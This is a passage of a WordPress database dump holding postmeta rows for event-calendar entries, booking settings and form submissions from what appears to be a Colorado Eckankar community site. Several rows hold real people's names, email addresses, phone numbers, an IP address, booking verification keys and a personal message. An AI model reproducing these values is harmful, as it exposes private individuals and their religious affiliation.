/>\r\n%%blog_name%%</p>\";}}'),(144098,265214,'passster_activate_global_protection',NULL),(162537,264902,'_wp_old_date','2022-02-18'),(162531,247336,'_wp_old_date','2022-02-18'),(162533,265030,'_wp_old_date','2022-02-18'),(162535,264903,'_wp_old_date','2022-02-18'),(144140,265217,'mec_tickets','a:0:{}'),(144139,265217,'mec_booking','a:0:{}'),(144138,265217,'mec_hourly_schedules','a:0:{}'),(144137,265217,'mec_not_in_days',''),(144136,265217,'mec_in_days',''),(144118,265217,'mec_end_time_hour','2'),(144119,265217,'mec_end_time_minutes','0'),(144120,265217,'mec_end_time_ampm','PM'),(144121,265217,'mec_end_day_seconds','50400'),(144122,265217,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-21\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-21\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144123,265217,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144124,265217,'mec_certain_weekdays','a:0:{}'),(144125,265217,'mec_allday','0'),(144126,265217,'mec_hide_time','0'),(144127,265217,'mec_hide_end_time','0'),(144128,265217,'mec_comment',''),(144129,265217,'mec_repeat_status','0'),(144130,265217,'mec_repeat_type',''),(144131,265217,'mec_repeat_interval','1'),(144132,265217,'mec_repeat_end',''),(144133,265217,'mec_repeat_end_at_occurrences',''),(144134,265217,'mec_repeat_end_at_date',''),(144135,265217,'mec_advanced_days','a:0:{}'),(144117,265217,'mec_end_date','2021-08-21'),(144116,265217,'mec_start_day_seconds','46800'),(144107,265217,'protect_children',''),(144108,265217,'mec_color',''),(144109,265217,'mec_location_id','119'),(144110,265217,'mec_dont_show_map','1'),(144111,265217,'mec_organizer_id','1'),(144112,265217,'mec_start_date','2021-08-21'),(144113,265217,'mec_start_time_hour','1'),(144114,265217,'mec_start_time_minutes','0'),(144115,265217,'mec_start_time_ampm','PM'),(144106,265217,'protect_children',''),(144105,265216,'_seq_num','7'),(144104,265216,'_form_id','44'),(142393,265021,'_field_62','ESA/Initiator-Roy Ludwick'),(142392,265021,'_field_59','Boulder'),(142391,265021,'_field_58','(720) 431-9880'),(142390,265021,'_field_57','darlenerreed@comcast.net'),(183777,268531,'mec_fees','a:0:{}'),(183778,268531,'mec_ticket_variations_global_inheritance','1'),(183779,268531,'mec_ticket_variations','a:0:{}'),(183780,268531,'mec_reg_fields_global_inheritance','1'),(183781,268531,'mec_reg_fields','a:0:{}'),(183782,268531,'mec_bfixed_fields','a:0:{}'),(183783,268531,'mec_op','a:0:{}'),(183784,268531,'mec_fields','a:0:{}'),(183785,268531,'mec_event_status','EventScheduled'),(183786,268531,'mec_moved_online_link',''),(183787,268531,'mec_cancelled_reason',''),(183788,268531,'mec_display_cancellation_reason_in_single_page',''),(183789,268531,'boldgrid_hide_page_title','0'),(183790,268531,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(183791,268531,'passster_activate_global_protection',NULL),(183792,268531,'passster_activate_protection',NULL),(183793,268531,'passster_protection_type','password'),(183794,268531,'boldgrid_in_page_containers','1'),(183795,268531,'passster_area_shortcode',''),(183796,268531,'_thumbnail_id','267574'),(183798,268531,'_dp_original','268479'),(183799,268531,'_edit_lock','1687403537:2'),(183800,268531,'_edit_last','2'),(183801,268532,'mec_transaction_id','MLC23904'),(183802,268532,'mec_user_id','1000081'),(183803,268532,'mec_verified','1'),(147901,265743,'protect_children',''),(147902,265743,'_field_402','test'),(147903,265743,'_field_403','reg'),(147904,265743,'_field_404','choll.03@comcast.net'),(147905,265743,'_form_id','44'),(183804,268532,'mec_verification_key','e9650836a454db81b7793c8457a23236'),(183805,268532,'mec_cancellation_key','b4e9745d5e4f5939a737ea6bffbdb1a5'),(183806,268532,'mec_confirmed','1'),(183807,268532,'mec_event_id','268482'),(183808,268532,'mec_date','1686479400:1686483000'),(183809,268532,'mec_ticket_id',',1,'),(183810,268532,'mec_booking_time','2023-05-27 07:14:32'),(183811,268532,'mec_all_dates','a:0:{}'),(183812,268532,'mec_other_dates','a:0:{}'),(183813,268532,'mec_attention_time','1686479400:1686483000'),(183814,268532,'mec_attention_time_start','1686479400'),(183815,268532,'mec_attention_time_end','1686483000'),(183816,268532,'mec_book_date_submit','20230527071432'),(183817,268532,'mec_booking_location','129'),(183818,268532,'mec_ticket_price_1','0'),(183819,268532,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(183820,268532,'mec_price','0'),(183821,268532,'mec_gateway','MEC_gateway_free'),(183822,268532,'mec_gateway_label','Free'),(183949,268565,'one_occurrence','0'),(183950,268565,'mec_hide_time','0'),(183934,268565,'mec_location_id','185'),(183935,268565,'mec_dont_show_map','0'),(183936,268565,'mec_organizer_id','1'),(183937,268565,'mec_read_more',''),(183938,268565,'mec_more_info',''),(183939,268565,'mec_more_info_title',''),(183940,268565,'mec_more_info_target','_self'),(183941,268565,'mec_cost',''),(183942,268565,'mec_currency','a:0:{}'),(183943,268565,'mec_additional_organizer_ids','a:0:{}'),(183944,268565,'mec_additional_location_ids','a:0:{}'),(183945,268565,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183946,268565,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183947,268565,'mec_certain_weekdays','a:0:{}'),(183948,268565,'mec_allday','0'),(140969,264623,'passster_activate_global_protection',NULL),(140970,264623,'passster_activate_protection',NULL),(140971,264623,'passster_protection_type','password'),(143455,264588,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143349,265121,'_form_id','16'),(143342,265121,'_field_167','Jayme'),(183933,268565,'mec_color',''),(183707,268530,'mec_ticket_variations_global_inheritance','1'),(183708,268530,'mec_ticket_variations','a:0:{}'),(183706,268530,'mec_fees','a:0:{}'),(183705,268530,'mec_fees_global_inheritance','1'),(183704,268530,'mec_tickets','a:0:{}'),(193681,269202,'_field_651','(407) 212-8381'),(193895,269231,'original-file','2023/10/sunset-gold-ocean-eagle-7-updraft-pre-smush-original.jpg'),(185916,268691,'smush-info','The file was compressed from 6.83 KB to 5.50 KB saving 19.38 percent using WP-Optimize'),(185915,268691,'smush-complete','1'),(193680,269202,'_field_653','Momnancybell@gmail.com'),(191693,269055,'_field_224','Ana'),(191694,269055,'_field_225','Sanchez-Vivas'),(191695,269055,'_field_226','asanchezvivas@gmail.com'),(191696,269055,'_field_227','TX'),(191697,269055,'_field_228','US'),(191698,269055,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(191699,269055,'_form_id','21'),(191700,269055,'_seq_num','187'),(183691,268530,'mec_end_time_ampm','PM'),(183692,268530,'mec_end_day_seconds','52200'),(183693,268530,'mec_repeat_status','1'),(183694,268530,'mec_repeat_type','custom_days'),(183695,268530,'mec_repeat_interval','1'),(183696,268530,'mec_repeat_end','never'),(183697,268530,'mec_repeat_end_at_occurrences','9'),(183698,268530,'mec_repeat_end_at_date',''),(183699,268530,'mec_advanced_days','a:0:{}'),(183700,268530,'mec_in_days','2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM'),(183701,268530,'mec_not_in_days',''),(183702,268530,'mec_hourly_schedules','a:0:{}'),(183703,268530,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(144285,265226,'_field_224','Joanne'),(144284,265225,'_seq_num','76'),(144283,265225,'_form_id','13'),(142389,265021,'_field_56','Reed'),(142388,265021,'_field_55','Darlene'),(144290,265226,'_field_229','a:2:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(144289,265226,'_field_228','US'),(144288,265226,'_field_227','CO'),(144299,265229,'_field_366','Hi, we’re both Eckists, and are considering moving to Durango area. Are there any eckists who live in Durango area? Thinking socializing as we as spiritual activities, so we’re wondering how many eckists live in Durango area.  May the Blessings be, Gary and Kathy'),(144298,265229,'_field_365','Moving to Durango'),(144297,265229,'_field_364','gpzeb99@gmail.com'),(144302,265230,'_field_224','Elizabeth'),(144301,265229,'_seq_num','2'),(144300,265229,'_form_id','39'),(144307,265230,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(144306,265230,'_field_228','DE'),(144305,265230,'_field_227','CO'),(141127,264447,'show_only_one_occurrence','0'),(141128,264447,'show_ongoing_events','0'),(141129,264444,'_edit_lock','1620589773:2'),(141130,264444,'_edit_last','2'),(141131,264444,'show_only_one_occurrence','0'),(141132,264444,'show_ongoing_events','0'),(141133,264441,'_edit_lock','1653662532:2'),(141134,264441,'_edit_last','2'),(141135,264441,'show_only_one_occurrence','0'),(141136,264441,'show_ongoing_events','0'),(141137,264415,'_edit_last','2'),(141138,264415,'show_only_one_occurrence','0'),(141139,264415,'show_ongoing_events','0'),(141140,264889,'protect_children',''),(141141,264889,'protect_children',''),(141142,264889,'mec_color',''),(141143,264889,'mec_location_id','119'),(141144,264889,'mec_dont_show_map','1'),(141145,264889,'mec_organizer_id','1'),(141146,264889,'mec_start_date','2021-05-12'),(141147,264889,'mec_start_time_hour','7'),(141148,264889,'mec_start_time_minutes','0'),(141149,264889,'mec_start_time_ampm','PM'),(141150,264889,'mec_start_day_seconds','68400'),(141151,264889,'mec_end_date','2021-05-12'),(141152,264889,'mec_end_time_hour','8'),(141153,264889,'mec_end_time_minutes','0'),(141154,264889,'mec_end_time_ampm','PM'),(141155,264889,'mec_end_day_seconds','72000'),(141156,264889,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-12\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141157,264889,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141158,264889,'mec_certain_weekdays','a:0:{}'),(141159,264889,'mec_allday','0'),(141160,264889,'mec_hide_time','0'),(141161,264889,'mec_hide_end_time','0'),(141162,264889,'mec_comment',''),(141163,264889,'mec_repeat_status','0'),(141164,264889,'mec_repeat_type',''),(141165,264889,'mec_repeat_interval','1'),(141166,264889,'mec_repeat_end',''),(141167,264889,'mec_repeat_end_at_occurrences',''),(141168,264889,'mec_repeat_end_at_date',''),(141169,264889,'mec_advanced_days','a:0:{}'),(141170,264889,'mec_in_days',''),(141171,264889,'mec_not_in_days',''),(141172,264889,'mec_hourly_schedules','a:0:{}'),(141173,264889,'mec_booking','a:0:{}'),(141174,264889,'mec_tickets','a:0:{}'),(141175,264889,'mec_fees_global_inheritance','1'),(141176,264889,'mec_fees','a:0:{}'),(141177,264889,'mec_ticket_variations_global_inheritance','1'),(141178,264889,'mec_ticket_variations','a:0:{}'),(141179,264889,'mec_reg_fields_global_inheritance','1'),(141180,264889,'mec_reg_fields','a:0:{}'),(141181,264889,'mec_op','a:0:{}'),(141182,264889,'mec_event_date_submit','20210422154949'),(141183,264889,'_edit_lock','1635961859:2'),(141184,264889,'_edit_last','2'),(141185,264889,'mec_read_more',''),(141186,264889,'mec_more_info',''),(141187,264889,'mec_more_info_title',''),(141188,264889,'mec_more_info_target','_self'),(141189,264889,'mec_cost',''),(141190,264889,'mec_currency','a:0:{}'),(141191,264889,'mec_additional_organizer_ids','a:0:{}'),(141192,264889,'mec_additional_location_ids','a:0:{}'),(141193,264889,'one_occurrence','0'),(141194,264889,'mec_timezone','global'),(141195,264889,'mec_countdown_method','global'),(141196,264889,'mec_public','1'),(141197,264889,'mec_bfixed_fields','a:0:{}'),(141198,264889,'mec_fields','a:0:{}'),(141199,264889,'mec_event_status','EventScheduled'),(141200,264889,'mec_moved_online_link',''),(141201,264889,'mec_cancelled_reason',''),(141202,264889,'mec_display_cancellation_reason_in_single_page',''),(141204,264889,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141205,264889,'passster_activate_global_protection',NULL),(141206,264889,'passster_activate_protection',NULL),(141207,264889,'passster_protection_type','password'),(141210,264890,'protect_children',''),(141211,264890,'protect_children',''),(141212,264890,'mec_color',''),(141213,264890,'mec_location_id','119'),(141214,264890,'mec_dont_show_map','1'),(141215,264890,'mec_organizer_id','1'),(141216,264890,'mec_start_date','2021-05-17'),(141217,264890,'mec_start_time_hour','3'),(141218,264890,'mec_start_time_minutes','0'),(141219,264890,'mec_start_time_ampm','PM'),(141220,264890,'mec_start_day_seconds','54000'),(141221,264890,'mec_end_date','2021-05-17'),(141222,264890,'mec_end_time_hour','4'),(141223,264890,'mec_end_time_minutes','0'),(141224,264890,'mec_end_time_ampm','PM'),(141225,264890,'mec_end_day_seconds','57600'),(141226,264890,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-17\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-17\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141227,264890,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141228,264890,'mec_certain_weekdays','a:0:{}'),(141229,264890,'mec_allday','0'),(141230,264890,'mec_hide_time','0'),(141231,264890,'mec_hide_end_time','0'),(141232,264890,'mec_comment',''),(141233,264890,'mec_repeat_status','0'),(141234,264890,'mec_repeat_type',''),(141235,264890,'mec_repeat_interval','1'),(141236,264890,'mec_repeat_end',''),(141237,264890,'mec_repeat_end_at_occurrences',''),(141238,264890,'mec_repeat_end_at_date',''),(141239,264890,'mec_advanced_days','a:0:{}'),(141240,264890,'mec_in_days',''),(141241,264890,'mec_not_in_days',''),(141242,264890,'mec_hourly_schedules','a:0:{}'),(141243,264890,'mec_booking','a:0:{}'),(141244,264890,'mec_tickets','a:0:{}'),(141245,264890,'mec_fees_global_inheritance','1'),(141246,264890,'mec_fees','a:0:{}'),(141247,264890,'mec_ticket_variations_global_inheritance','1'),(141248,264890,'mec_ticket_variations','a:0:{}'),(141249,264890,'mec_reg_fields_global_inheritance','1'),(141250,264890,'mec_reg_fields','a:0:{}'),(141251,264890,'mec_op','a:0:{}'),(141252,264890,'mec_event_date_submit','20210422154949'),(141253,264890,'_edit_lock','1620590705:2'),(141254,264890,'_edit_last','2'),(141255,264890,'mec_read_more',''),(141256,264890,'mec_more_info',''),(141257,264890,'mec_more_info_title',''),(141258,264890,'mec_more_info_target','_self'),(141259,264890,'mec_cost',''),(141260,264890,'mec_currency','a:0:{}'),(141261,264890,'mec_additional_organizer_ids','a:0:{}'),(141262,264890,'mec_additional_location_ids','a:0:{}'),(141263,264890,'one_occurrence','0'),(141264,264890,'mec_timezone','global'),(141265,264890,'mec_countdown_method','global'),(141266,264890,'mec_public','1'),(141267,264890,'mec_bfixed_fields','a:0:{}'),(141268,264890,'mec_fields','a:0:{}'),(141269,264890,'mec_event_status','EventScheduled'),(141270,264890,'mec_moved_online_link',''),(141271,264890,'mec_cancelled_reason',''),(141272,264890,'mec_display_cancellation_reason_in_single_page',''),(141273,264890,'_thumbnail_id','264651'),(141274,264890,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141275,264890,'passster_activate_global_protection',NULL),(141276,264890,'passster_activate_protection',NULL),(141277,264890,'passster_protection_type','password'),(141278,264891,'protect_children',''),(141279,264891,'protect_children',''),(141280,264891,'mec_color',''),(141281,264891,'mec_location_id','119'),(141282,264891,'mec_dont_show_map','1'),(141283,264891,'mec_organizer_id','1'),(141284,264891,'mec_start_date','2021-05-24'),(141285,264891,'mec_start_time_hour','7'),(141286,264891,'mec_start_time_minutes','0'),(141287,264891,'mec_start_time_ampm','PM'),(141288,264891,'mec_start_day_seconds','68400'),(141289,264891,'mec_end_date','2021-05-24'),(141290,264891,'mec_end_time_hour','8'),(141291,264891,'mec_end_time_minutes','0'),(141292,264891,'mec_end_time_ampm','PM'),(141293,264891,'mec_end_day_seconds','72000'),(141294,264891,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-24\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-24\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141295,264891,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141296,264891,'mec_certain_weekdays','a:0:{}'),(141297,264891,'mec_allday','0'),(141298,264891,'mec_hide_time','0'),(141299,264891,'mec_hide_end_time','0'),(141300,264891,'mec_comment',''),(141301,264891,'mec_repeat_status','0'),(141302,264891,'mec_repeat_type',''),(141303,264891,'mec_repeat_interval','1'),(141304,264891,'mec_repeat_end',''),(141305,264891,'mec_repeat_end_at_occurrences',''),(141306,264891,'mec_repeat_end_at_date',''),(141307,264891,'mec_advanced_days','a:0:{}'),(141308,264891,'mec_in_days',''),(141309,264891,'mec_not_in_days',''),(141310,264891,'mec_hourly_schedules','a:0:{}'),(141311,264891,'mec_booking','a:0:{}'),(141312,264891,'mec_tickets','a:0:{}'),(141313,264891,'mec_fees_global_inheritance','1'),(141314,264891,'mec_fees','a:0:{}'),(141315,264891,'mec_ticket_variations_global_inheritance','1'),(141316,264891,'mec_ticket_variations','a:0:{}'),(141317,264891,'mec_reg_fields_global_inheritance','1'),(141318,264891,'mec_reg_fields','a:0:{}'),(141319,264891,'mec_op','a:0:{}'),(141320,264891,'mec_event_date_submit','20210422154949'),(141321,264891,'_edit_lock','1621787411:2'),(141322,264891,'_edit_last','2'),(141323,264891,'mec_read_more',''),(141324,264891,'mec_more_info',''),(141325,264891,'mec_more_info_title',''),(141326,264891,'mec_more_info_target','_self'),(141327,264891,'mec_cost',''),(141328,264891,'mec_currency','a:0:{}'),(141329,264891,'mec_additional_organizer_ids','a:0:{}'),(141330,264891,'mec_additional_location_ids','a:0:{}'),(141331,264891,'one_occurrence','0'),(141332,264891,'mec_timezone','global'),(141333,264891,'mec_countdown_method','global'),(141334,264891,'mec_public','1'),(141335,264891,'mec_bfixed_fields','a:0:{}'),(141336,264891,'mec_fields','a:0:{}'),(141337,264891,'mec_event_status','EventScheduled'),(141338,264891,'mec_moved_online_link',''),(141339,264891,'mec_cancelled_reason',''),(141340,264891,'mec_display_cancellation_reason_in_single_page',''),(141341,264891,'_thumbnail_id','264651'),(141342,264891,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 